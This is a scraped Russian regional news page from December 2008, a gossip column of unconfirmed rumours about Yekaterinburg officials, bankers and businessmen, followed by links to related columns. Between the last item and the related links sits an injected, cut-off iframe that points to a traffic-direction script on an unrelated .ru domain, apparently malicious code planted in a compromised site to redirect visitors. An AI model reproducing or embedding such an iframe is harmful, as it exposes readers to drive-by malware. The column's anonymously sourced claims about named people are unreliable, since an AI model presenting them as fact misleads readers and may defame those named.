19.12.2008, 12:45

Слухи и версии, 19 декабря

В общественной приемной Владимира Путина не платят зарплату
Говорят, что настроение руководителя общественной приемной Владимира Путина в Екатеринбурге Елены Чечуновой близко к паническому. По неофициальной информации, надежд на то, что ее сотрудникам выплатят заработную плату до наступления новогодних каникул, остается все меньше.
Как уверяют слухмейкеры, на каком уровне политической вертикали власти и по какой причине был перекрыт финансовый краник, толком никто не понимает, однако уже в ноябре выплаты по проекту были прекращены.
Владимир Фролов хочет создать расчетный банк
Говорят, что экс-владелец «Северной казны» Владимир Фролов все же не смог покинуть банковскую сферу и уже к февралю может создать расчетный банк. По неофициальной информации, причиной такого решения стали не столько соображения делового характера, сколько личностные амбиции банкира, желающего показать деловому сообществу, что его рано списывать со счетов и что именно он является лучшим банкиром Свердловской области.
Как уверяют слухмейкеры, в проект Владимир Николаевич готов вложить средства, полученные за «Казну» от Альфа-Банка, и ресурсы, извлеченные из строительного бизнеса сына, — всего около 300 миллионов рублей. Говорят, что банк не будет заниматься привлечением средств физлиц и кредитованием, а сосредоточится исключительно на обеспечении расчетов между клиентами.
Злые же языки напоминают, что по сути это будет первый самостоятельный старт-ап Владимира Фролова и его ждет огромное количество трудностей.
Имя «заказчика» Павла Чернавина станет известно уже на следующей неделе
Говорят, что тема безденежья работников шахты «Горняк», приведшего к голодовке, могла появиться не случайно. Слухмейкеров на эту мысль навел тот факт, что в материалах ряда СМИ на эту тему не всегда к месту, но упорно стали «пришивать» бизнесмена Павла Чернавина.
По неофициальной информации, суть и заказчик интриги могут быть названы уже на следующей неделе, ведь в новогодние каникулы гражданам будет уже не до медиавойн.
Александр Коберниченко возвращается в политику
Говорят, что забытый всеми «серый кардинал серого дома» Александр Коберниченко намерен вернуться в политику в самое ближайшее время. По неофициальной информации, он готов принять участие в мартовских выборах в Городскую думу Екатеринбурга, скорее всего — на деньги своего нынешнего босса Владимира Конькова.
Как уверяют слухмейкеры, именно Коберниченко имеет прямое отношение к эксгумации темы «Вице-мэр едва не задавил старушку», что наводит на мысль о том, что параллельно с выборами бывший чиновник хочет посчитаться с некогда изгнавшими его из мэрии силами.
Автомобилисты затеряются среди сотрудников спецслужб
Говорят, что все «силовые» структуры Екатеринбурга усиленно готовятся к предстоящей акции автолюбителей, протестующих против повышения пошлин на ввоз иномарок. По неофициальной информации, в результате возмущенные автомобилисты могут запросто затеряться среди превосходящих сил спецслужбистов и милиции.
Как уверяют слухмейкеры, как самого страшного кошмара власти ждут повторения владивостокского варианта, когда люди не просто блокировали жизненно важную магистраль, но и публично требовали отправить в отставку Владимира Путина.
На рынке трудоустройства активизировались мошенники
Говорят, что рост безработицы уже привел к резкому росту числа разного рода бюро по трудоустройству. По неофициальной информации, качество услуг при этом, напротив, падает.
Безработные слухмейкеры уверяют, что с них уже пытались брать деньги вперед за поиск вариантов. Еще одной сомнительной новинкой рынка неофициально называют подбор варианта, за который посредникам потом придется отчислить определенный процент от своей заработной платы.
<iframe src="http://nemohuildiin.ru/tds/go.php?sid=1

Похожие новости по теме
16.04.2010, 16:40

Слухи и версии, 16 апреля

Никто не понял смысла создания приемной Дмитрия Медведева в Екатеринбурге Говорят, что смысл появления приемной Дмитрия Медведева в Екатеринбурге так и остался непонятым местными элитами. По...

02.04.2010, 16:24

Слухи и версии, 2 апреля

Архиепископ Викентий может получить взыскание Говорят, что скандал со строительством храма на площади Труда может выйти боком архиепископу Екатеринбургскому и Верхотурскому. По неофициальной...

27.02.2010, 16:12

Слухи и версии, 27 февраля

Ветераном труда Свердловской области за № 1 станет Эдуард Россель Говорят, что первым обладателем звания «Ветеран труда Свердловской области», которое намерены ввести новые власти, станет бывший...

19.02.2010, 16:17

Слухи и версии, 19 февраля

Юрия Демина ждут новые неприятности Говорят, что с отставкой заместителя министра внутренних дел Николая Овчинникова новые проблемы могут возникнуть у руководителя свердловской ГИБДД Юрия Демина....

05.12.2008, 15:45

Слухи и версии, 05 декабря

Митрополита Кирилла могут остановить Говорят, что уже предсказанная многими победа главы Отдела внешних церковных связей Московского патриархата Митрополита Смоленского и Калининградского Кирилла в...


Мастрид
Погода на неделю
Популярные новости
Новости по дням
Новости по месяцам